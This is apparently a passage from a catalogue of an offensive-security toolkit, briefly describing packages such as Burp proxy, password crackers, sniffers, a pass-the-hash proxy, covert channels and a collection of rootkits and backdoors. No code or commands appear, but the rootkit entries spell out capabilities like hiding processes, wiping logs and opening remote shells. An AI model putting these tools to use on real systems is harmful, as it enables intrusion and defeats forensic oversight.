 - freport (a script for comparing ftest and ftestd log files)

        

Package Directory: /opt/Operator_Extras/Tools/sock_v101


Sock is a simple tool for manually attacking web-enabled applications. It 
allows a single HTTP request to be manipulated and re-issued repeatedly from 
the same window. Each response can be viewed as plain text or rendered as a 
web page, and can be searched for keywords. Sock supports SSL, and keeps a 
history of all requests and responses.

Sock provides a convenient graphical context in which to execute the kind of 
manual application testing that can be performed from a command line using 
tools such as netcat and stunnel. In addition, sock automatically handles 
various encodings of server responses, including chunked transfer-encoding 
and compressed content-encoding.

        

Package Directory: /opt/Operator_Extras/Tools/bgpcrack-21


bgpcrack tries to guess, by brute force, the key used to create the
MD5 hash of a TCP segment as described in RFC2385. Network packets are
stored in a file in pcap format, and the dictionary of words to use in
the brute-force attempt is a text file that contains one password per
line.

The "bgp" in "bgpcrack" is historical: bgpcrack does not have anything
to do with BGP - it just tries to guess the password used to generate a
TCP signature of _any_ TCP segment, not just those that are part of a
BGP conversation.

        

Package Directory: /opt/Operator_Extras/Tools/tcptraceroute-14


A traceroute implementation using TCP packets

        

Package Directory: /opt/Operator_Extras/Tools/proxychains-21


This program allows you to use SSH, TELNET, VNC, FTP and any other Internet 
application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers. This 
"proxifier" provides proxy server support to any app.

        

Package Directory: /opt/Operator_Extras/Tools/dnstracer-16


Dnstracer determines where a given Domain Name Server (DNS) gets
its information from, and follows the chain of DNS servers back to
the servers which know the data.

Its behaviour is similair to ntptrace(8), which does it for the
NTP protocol.

        

Package Directory: /opt/Operator_Extras/Tools/WifiScanner-095


WifiScanner is a tool that has been designed to discover wireless node 
(i.e access point and wireless clients). 
It works with CISCO cards and prism cards with hostap driver or wlan-ng driver.
        

Package Directory: /opt/Operator_Extras/Tools/rootkits


Miscellaneous collection of rootkits.

Files:

DevNull-rootkit-v0.9.tar.bz2
   DevNull Rootkit v0.9 - Linux rootkit, modified login, chsh, chfn and su. 
   Our login, when in place, will not show the defined user logged into the 
   system, nor log the connection origin

_root_040.zip
   Windows NT Rootkit v0.04 alpha - Hides processes, files, directories, has 
   k-mode shell using TCP/IP - you can telnet into rootkit from remote. Hides 
   registry keys - (keyboard patch disabled in this build.) Includes execution 
   redirection.

allinone.c
   Allinone.c is a backdoor which is a http server, a sockets transmit server, 
   a shell backdoor, a icmp backdoor, a bind shell backdoor, a http shell, 
   copy file from remote host, can use a socks5 proxy

cb-r00tkit.tgz
   A rootkit which backdoors quite a few things, wipes logs, etc

dica.tgz
   Dica is a rootkit found in the wild. Looks like a t0rn variant

fbrk1-imps.tar.gz
   FreeBSD rootkit. Patches ls, du, find, locate, ps, top, strings, ifconfig, 
   netstat, login, and ftpd. Includes backdoor sysback and sniffer zxsniff

fbsd.tgz
   FreeBSD rootkit precompiled binaries for 4.2-RELEASE.

flea.tar.gz
   FLEA is a linux rootkit for all distributions

login.tgz
   login package for linux - backdoored.

lrk5.src.tar.gz
   Linux Rootkit 5 - Recent release of the famous linux rootkit. Contains 
   backdoored versions of chfn, chsh, crontab, du, find, ifconfig, inetd, 
   killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, syslogd, 
   tcpd, top, sshd, and su. Also comes with bindshell, fix, linsniffer, 
   thesniff, sniffchk, wted, and z2. Changes: sshd-2.0.13 patch, a better 
   sniffer, a backdoored su, and better crontab. Warning: This software causes 
   anti-virus false positives.

tk.tgz
   Torn Kit is a linux rootkit which has been optimized for linux/x86 mass 
   installation. It is the first rootkit which uses precompiled binaries yet 
   still allows a user defined password. This code is being widely used to 
   automatically compromise hosts which have the wu.ftpd and rpc.statd 
   vulnerabilities, and was mentioned in CERT's recent Incident Note 
   IN-2000-10 advisory

udp-remote-final.tar.gz
   This utility demonstrates a simple udp backdoor which allows for remote 
   program execution on a Unix server

wu-ftpd-2.6.2-backdoored.gz
   Wuftpd 2.6.2 backdoored

zappa 0.1beta
   'zappa' is an advanced backdoor, which doesn't listen on a TCP-port for
   clients, further it waits for a special ICMP-packet and then it 'connects'
   to an UDP-server on the 'client'.

cd00r
   'cd00r.c' is a proof of concept code to test the idea of a 
   completely invisible (read: not listening) backdoor server. 

hxdef100.zip
   Hacker Defender - This is the Hacker Defender rootkit for Windows. This 
   is more of a 'blackhat' tool than a training example.

rk_044.zip
   NT Rootkit - The original and first public NT ROOTKIT - has not been 
   updated for many years but is good for ideas.

FU_Rootkit.zip
   The FU rootkit can hide processes, elevate process privileges, fake out 
   the Windows Event Viewer so that forensics is impossible, and even 
   hide device drivers (NEW!) All this without any hooking.

vanquish-0.2.0.zip 
   Vanquish is a DLL injection based Romanian rootkit that hides files, 
   folders, registry entries and logs passwords.

        

Package Directory: /opt/Operator_Extras/Tools/wepwedgie-010


WEPWedgie is a toolkit for determining 802.11 WEP keystreams and injecting 
traffic with known keystreams. The toolkit also includes logic for firewall 
rule mapping, pingscanning, and portscanning via the injection channel and a 
cellular modem
        

Package Directory: /opt/Operator_Extras/Tools/lcrack


lcrack Description:

Lepton's Crack is a generic password cracker, easily customizable with
a simple plug-in system. It can perform a dictionary-based (wordlist)
attack, as well as a brute-force (incremental) password scan.

For the incremental scan, the user can provide a regex-like expression
that will be enumerated, thus checking every possible combination. This
powerful feature effectively combines `shoulder-surfing' with standard
brute-forcing.

By default it comes with the following modules:

        * md4  : standard MD4 hash
        * md5  : standard MD5 hash
        * nt4  : NT MD4/Unicode
        * dom  : Lotus Domino HTTP password
        * sha1 : standard SHA-1 hash
        * null : trivial 1-byte hash
                 (sample for plug-in developers :)

        

Package Directory: /opt/Operator_Extras/Tools/fakemac-01


Changes MAC address to a randomly generated address using a vendor MAC
file to supply the 3-byte vendor portion of the MAC address.
The vendor MAC file is the same file used in the ethereal installation.

        

Package Directory: /opt/Operator_Extras/Tools/DefaultPasswordList


The Default Password List is a collection of accounts and passwords that are, 
by default, the initial passwords for specific accounts on a given computer 
system. Sometimes these passwords are installed out-of-box, sometimes they are 
automatically installed by software, and sometimes they are installed by 
consultants that are brought in to perform services. This list should be used 
as a resource for computer security consultants interested in testing the 
security configuration of equipment.

        

Package Directory: /opt/Operator_Extras/Tools/ncovert-10


NCovert 1.0  - NMRC Covert Channel
Simple Nomad - 

A file transfer system that uses the TCP protocol to covertly move data from 
one system to another. NCovert has two flavors - one with more flexability 
to bounce the data around, and one that is a little more stealthy in hiding 
the transmission (it looks like a port scan on a sniffer!)

        

Package Directory: /opt/Operator_Extras/Tools/smbproxy-10


SMBProxy is a "Passing The Hash" tool that works as a proxy.
It makes it possible to authenticate to a Windows NT4/2000
server by only knowing the md4 hash. It also makes it
possible to mount shares, access the registry and anything
else you could do with that particular users privileges.

        

Package Directory: /opt/Operator_Extras/Tools/PHoss-0113


PHoss is a sniffer designed to find HTTP, FTP, LDAP, Telnet, IMAP4 and POP3 
logins on the wire. It also sniffs the VNC challange/response handshake.
Hard to find and has great effect !
        

Package Directory: /opt/Operator_Extras/Tools/apsr-017


APSR is a network testing tool, designed to send and recieve arbitrary network 
packets.  It can be used to test firewalls, routing, security and many other 
things. The project is splitted in two main programs, apsend to create 
packets and aprecv to sniff packets. 
The main goal of the APSR project is to develop a high quality network testing 
tool. 

        

Package Directory: /opt/Operator_Extras/Tools/nmbping


nmbping
   This tool can be used to find all systems running NetBIOS services on your 
   network. It has the ability to determine whether the system is running Samba 
   or a Windows® variant. This is a quick way to find systems which may be 
   vulnerable the Samba® vulnerabilities covered in advisory DDI-1013

   http://www.digitaldefense.net/labs/securitytools.html
        

Package Directory: /opt/Operator_Extras/Tools/LdapMiner


Ldapminer by Sacha Faust : sacha@smugline.net
---------------------------------------------

This is a tool I wrote to collect information from different LDAP Server 
implementation.
This was written in C with the Netscape C LDAP SDK.

This is beta software and I am in the process of creating a decent environment 
to continue adding functionality to it. If you wish to contribute to this 
project, e-mail me at sacha@smugline.net . If you compile this on other 
operating system, please send me the makefile and modifications if necessary. 
The software currently as specific checks for Microsoft Exchange server and 
Netscape Directory server, more to come.


        

Package Directory: /opt/Operator_Extras/Tools/packit


Packit is a network auditing tool. It's value is derived from its ability
to customize, inject, monitor, and manipulate IP traffic. By allowing you
to define (spoof) all TCP, UDP, ICMP, IP, ARP, RARP and Ethernet
header options, Packit can be useful in testing firewalls, intrusion   
detection systems, port scanning, simulating network traffic and general
TCP/IP auditing. Packit is also an excellent tool for learning TCP/IP.
        

Package Directory: /opt/Operator_Extras/Tools/burpproxy_v122


Burp proxy is an interactive HTTP/S proxy server for attacking and debugging 
web-enabled applications. It operates as a man-in-the-middle between the 
end browser and the target web server, and allows the user to intercept, 
inspect and modify the raw traffic passing in both directions.

Burp proxy allows an attacker to find and exploit application vulnerabilities 
by monitoring and manipulating critical parameters and other data transmitted 
by the application. By modifying browser requests in various malicious ways, 
burp proxy can be used to perform attacks such as SQL injection, cookie 
subversion, privilege escalation, session hijacking, directory traversal 
and buffer overflows.
        

Package Directory: /opt/Operator_Extras/Tools/stegtunnel-04


Stegtunnel provides a covert channel in the IPID and sequence number fields of 
any desired TCP connection. It requires the server and client to have a 
previously shared secret in common to detect and decrypt the data. You don't 
have to worry about the connections looking unlike real TCP connections, 
because they are real connections, just with extra info in certain fields.